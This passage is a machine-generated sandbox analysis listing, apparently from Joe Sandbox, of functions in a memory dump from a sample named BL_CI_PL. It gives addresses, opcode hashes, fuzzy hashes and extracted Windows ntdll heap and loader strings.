                                                                                                                                                      • API String ID: 3446177414-1700792311
                                                                                                                                                      • Opcode ID: 0af8edec5393ccbb994a6fa1d6aafb7640d0cf89052f3e08e6b32a6d259a23f6
                                                                                                                                                      • Instruction ID: 2c0afd6589bc538a8f1c5e1512e9740959f9036e46fc9fb43d9b47aa75b8d8d2
                                                                                                                                                      • Opcode Fuzzy Hash: 0af8edec5393ccbb994a6fa1d6aafb7640d0cf89052f3e08e6b32a6d259a23f6
                                                                                                                                                      • Instruction Fuzzy Hash: 4DD1F335504685DFCB22CFA8C490AADBBF6FF89310F048A5EE8459B752D735A981CF10
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8DDA20, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                                                                      • API String ID: 3446177414-3224558752
                                                                                                                                                      • Opcode ID: b10a4a09f937279abed18b2da23fff095e618d6ad8f6b53dae843c8896c4aad7
                                                                                                                                                      • Instruction ID: ebe54a65b87e4b381568a7d8354f6c8a3860a487e46677da6f5bb182b6f66092
                                                                                                                                                      • Opcode Fuzzy Hash: b10a4a09f937279abed18b2da23fff095e618d6ad8f6b53dae843c8896c4aad7
                                                                                                                                                      • Instruction Fuzzy Hash: 31413635954789DFC722DF28C494B99B3A9FF40320F048B6DE8168B3C1C738A984CB90
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8DDAC0, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                                                                      • API String ID: 3446177414-1222099010
                                                                                                                                                      • Opcode ID: 86936b012511a38ad7d06f19cadea97447cc5cd2f91babb9721754840e30578c
                                                                                                                                                      • Instruction ID: f19bd5dd62c6fc0db5f8b261023cc16b33072bd5ccbde0271516257a4cb5ed45
                                                                                                                                                      • Opcode Fuzzy Hash: 86936b012511a38ad7d06f19cadea97447cc5cd2f91babb9721754840e30578c
                                                                                                                                                      • Instruction Fuzzy Hash: 6D3100355147CCDFD722CF28C858FA97BA9FF01768F044B99E8028B791C779A988CA11
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8E4C3D, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 1E92344A, 1E923476
                                                                                                                                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 1E923466
                                                                                                                                                      • LdrpFindDllActivationContext, xrefs: 1E923440, 1E92346C
                                                                                                                                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1E923439
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                                                      • API String ID: 3446177414-3779518884
                                                                                                                                                      • Opcode ID: 9db3e8ac34cd91deae3a5aa1e180387fdb2a13e1e14ae253c850780dde7b558a
                                                                                                                                                      • Instruction ID: e00536071bbb5710b84bcc47732331ff08f497dee7669940f19939fee1637492
                                                                                                                                                      • Opcode Fuzzy Hash: 9db3e8ac34cd91deae3a5aa1e180387fdb2a13e1e14ae253c850780dde7b558a
                                                                                                                                                      • Instruction Fuzzy Hash: 3D314E72E00297AFDB12DB1C889AA59B2A5FF83354F42832AD90D57EC4D7709D80C7D1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8C0680, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                      • API String ID: 0-4253913091
                                                                                                                                                      • Opcode ID: 88da66ffb26acf61d7442b21fff1a321b7c1c718d73947058aa74cdc301fd89e
                                                                                                                                                      • Instruction ID: 8ad0d6fb811714eca10da0fc7248ad4eace876b97c163c49f6ccbaad1d8db7a4
                                                                                                                                                      • Opcode Fuzzy Hash: 88da66ffb26acf61d7442b21fff1a321b7c1c718d73947058aa74cdc301fd89e
                                                                                                                                                      • Instruction Fuzzy Hash: 3CF1BE74A0064ADFDB05CF69C890BAAB7B6FF86740F14866DE4159B381D734E982CF90
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8D0AEB, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 1E919F2E
                                                                                                                                                      • Failed to allocated memory for shimmed module list, xrefs: 1E919F1C
                                                                                                                                                      • LdrpCheckModule, xrefs: 1E919F24
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 3446177414-161242083
                                                                                                                                                      • Opcode ID: 3c732b401bb2a524721acff42251abf68d39b7af26a8861e391dfbef9151fd81
                                                                                                                                                      • Instruction ID: 85b598013651d358d2448a25c393deb2f12dab150e90cba5ac757a0000a11a65
                                                                                                                                                      • Opcode Fuzzy Hash: 3c732b401bb2a524721acff42251abf68d39b7af26a8861e391dfbef9151fd81
                                                                                                                                                      • Instruction Fuzzy Hash: F171BE74A042499FDB05DF68C890AAEB7F6FF84708F18466DE802EB355E730AD46CB50
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E98ACEB, Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3446177414-0
                                                                                                                                                      • Opcode ID: 375523c332eeb3efdbe689127e94438d8dcd868dc67ca018378924086731b63e
                                                                                                                                                      • Instruction ID: 22b94db48604072f8e2a00f7b2bff2ce94679b6ccc06c27598edd14712258bfe
                                                                                                                                                      • Opcode Fuzzy Hash: 375523c332eeb3efdbe689127e94438d8dcd868dc67ca018378924086731b63e
                                                                                                                                                      • Instruction Fuzzy Hash: 74F11672E006598FCB19CF68C8A0A7DBBF6AF8820071A476DD456DB394E774E941CF50
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8DEE48, Relevance: 6.3, APIs: 4, Instructions: 347COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: c35b5c8876e87fcb1666956197b38c39bd9a379330fe326f760afbcb267188cc
                                                                                                                                                      • Instruction ID: 334d5de6910d52b6bca45d495cbf0c4510ebf8ca9fd50bc3a81404120ee235bb
                                                                                                                                                      • Opcode Fuzzy Hash: c35b5c8876e87fcb1666956197b38c39bd9a379330fe326f760afbcb267188cc
                                                                                                                                                      • Instruction Fuzzy Hash: D9E10274D00749CFCB25CFAAC980A9DBBF6FF48314F104A6AE446A72A4D730A885DF10
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E98A1F0, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: HEAP:
                                                                                                                                                      • API String ID: 3446177414-2466845122
                                                                                                                                                      • Opcode ID: a40a5f473b1f0cf0c69d9f80fd5a44d0e75e4abb5d132201cf64007cb28200e3
                                                                                                                                                      • Instruction ID: ba22ce24be896bb6e49efbbea1a5bf780cbd73c5d388c40602c0ebde9fa07885
                                                                                                                                                      • Opcode Fuzzy Hash: a40a5f473b1f0cf0c69d9f80fd5a44d0e75e4abb5d132201cf64007cb28200e3
                                                                                                                                                      • Instruction Fuzzy Hash: E1A18E7161821A8FC745CE28C894E2AB7E6FF98314F054A6EE945DB360E7B4EC41CF91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8E7550, Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 1E924530
                                                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 1E924592
                                                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 1E924460
                                                                                                                                                      • ExecuteOptions, xrefs: 1E9244AB
                                                                                                                                                      • Execute=1, xrefs: 1E92451E
                                                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 1E924507
                                                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 1E92454D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                      • API String ID: 0-484625025
                                                                                                                                                      • Opcode ID: 68c7b5241be878527d4139e8a70a5ca4e923075c703e2306a0e68d2472f2818d
                                                                                                                                                      • Instruction ID: 9f5fd33b0901870ab60edc0c253b26bc7fb6f5b3a6bf0ba6dd0cd328526627c2
                                                                                                                                                      • Opcode Fuzzy Hash: 68c7b5241be878527d4139e8a70a5ca4e923075c703e2306a0e68d2472f2818d
                                                                                                                                                      • Instruction Fuzzy Hash: 4E512835A00259BBEF10ABE9DC95FAD73B9EF49304F000BADE505A76C0E771AA458F50
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8CA170, Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      • RtlpFindActivationContextSection_CheckParameters, xrefs: 1E9177DD, 1E917802
                                                                                                                                                      • SsHd, xrefs: 1E8CA304
                                                                                                                                                      • Actx , xrefs: 1E917819, 1E917880
                                                                                                                                                      • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E917807
                                                                                                                                                      • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E9177E2
                                                                                                                                                      • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 1E9178F3
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                                                                      • API String ID: 0-1988757188
                                                                                                                                                      • Opcode ID: 38f28e8324584f753280e1d1fdb86af915b42fb367cde38086f9af5baf33909f
                                                                                                                                                      • Instruction ID: b0f5a561f0e14f9883b8801090afa7116563c0963e45700da961217d5cbd5f86
                                                                                                                                                      • Opcode Fuzzy Hash: 38f28e8324584f753280e1d1fdb86af915b42fb367cde38086f9af5baf33909f
                                                                                                                                                      • Instruction Fuzzy Hash: F5E1D170A043468FD715CF65C9A0B9AF7E6BF86224F104BADE866CB2D0D731D845CB81
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8CD690, Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • RtlpFindActivationContextSection_CheckParameters, xrefs: 1E91914E, 1E919173
                                                                                                                                                      • GsHd, xrefs: 1E8CD794
                                                                                                                                                      • Actx , xrefs: 1E919315
                                                                                                                                                      • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E919178
                                                                                                                                                      • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E919153
                                                                                                                                                      • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 1E919372
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                                                                      • API String ID: 3446177414-2196497285
                                                                                                                                                      • Opcode ID: 39e568aa5e97859da72d087657729e9edb47046c33339f0de35c10a510ebb4dc
                                                                                                                                                      • Instruction ID: 8cb2b3911b704a202e9d2fdb0f0fb3e7eed4f5ca16d285c3a435b84e11cf4631
                                                                                                                                                      • Opcode Fuzzy Hash: 39e568aa5e97859da72d087657729e9edb47046c33339f0de35c10a510ebb4dc
                                                                                                                                                      • Instruction Fuzzy Hash: 78E18B706083468FD711DF19C890B9AB7E6FF89328F044B2DE9959B2C1D770E985CB92
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E95F0A5, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                                                      • API String ID: 3446177414-1745908468
                                                                                                                                                      • Opcode ID: a203ea23dde56675827ecd0ab54f6f4e50151de06bec282acdb102b504e167dc
                                                                                                                                                      • Instruction ID: 2d94a5c9a988b3e493ec3fa9cc57b77efa3ac50c77b673759c62eaa1c51d84ff
                                                                                                                                                      • Opcode Fuzzy Hash: a203ea23dde56675827ecd0ab54f6f4e50151de06bec282acdb102b504e167dc
                                                                                                                                                      • Instruction Fuzzy Hash: B591F039904685DFDB12CFA8C450AADBBF6FF89360F148A5EE845AB751C735A980CF10
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8A640D, Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • RtlDebugPrintTimes.NTDLL ref: 1E8A651C
                                                                                                                                                        • Part of subcall function 1E8A6565: RtlDebugPrintTimes.NTDLL ref: 1E8A6614
                                                                                                                                                        • Part of subcall function 1E8A6565: RtlDebugPrintTimes.NTDLL ref: 1E8A665F
                                                                                                                                                      Strings
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 1E9097A0, 1E9097C9
                                                                                                                                                      • LdrpInitShimEngine, xrefs: 1E909783, 1E909796, 1E9097BF
                                                                                                                                                      • apphelp.dll, xrefs: 1E8A6446
                                                                                                                                                      • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 1E90977C
                                                                                                                                                      • Getting the shim engine exports failed with status 0x%08lx, xrefs: 1E909790
                                                                                                                                                      • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 1E9097B9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 3446177414-204845295
                                                                                                                                                      • Opcode ID: c059ece442175e862d09354e45c88da8f0d86b3d29cef5a436d35730b6bb96eb
                                                                                                                                                      • Instruction ID: b26201a72db98c48a8fd27ac8551fc92e610eebc3401239488854cdd96f07028
                                                                                                                                                      • Opcode Fuzzy Hash: c059ece442175e862d09354e45c88da8f0d86b3d29cef5a436d35730b6bb96eb
                                                                                                                                                      • Instruction Fuzzy Hash: 4F518C766083449FD311DF24D890BABB7E9BFC4644F440A1DFA95972A4EB30E904DB92
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E92FA02, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                                                                                      • API String ID: 3446177414-4227709934
                                                                                                                                                      • Opcode ID: 418b33b8c2c6ec15cec2ae322837331767e369f2d8b8cc52f7a7139c3d7458c1
                                                                                                                                                      • Instruction ID: 547ad52d1f5df5de6dd0bd51f64202b0da35348653418bbf5b0a0499c7004d3f
                                                                                                                                                      • Opcode Fuzzy Hash: 418b33b8c2c6ec15cec2ae322837331767e369f2d8b8cc52f7a7139c3d7458c1
                                                                                                                                                      • Instruction Fuzzy Hash: 88415E7590121AABCF02CF95C894AEEBBBABF88354F54022DE905B7344D7719941DF90
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E95F8F8, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                                                                                      • API String ID: 3446177414-3492000579
                                                                                                                                                      • Opcode ID: f91e6a1a3a1764e5881a8a5dc3c69109d257b6fd832e1517975bf961d946279f
                                                                                                                                                      • Instruction ID: aeaa8dcbf8dbce52ba6ce0f1a8adb7197c6c2d88cf2f96835c8eb15044b4c92e
                                                                                                                                                      • Opcode Fuzzy Hash: f91e6a1a3a1764e5881a8a5dc3c69109d257b6fd832e1517975bf961d946279f
                                                                                                                                                      • Instruction Fuzzy Hash: 7C71BE35904685EFCB02DFA8D8A0AADFBF6FF89220F04865EE4459B351D735A980CF50
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8A6565, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 1E909854, 1E909895
                                                                                                                                                      • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1E909885
                                                                                                                                                      • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 1E909843
                                                                                                                                                      • LdrpLoadShimEngine, xrefs: 1E90984A, 1E90988B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
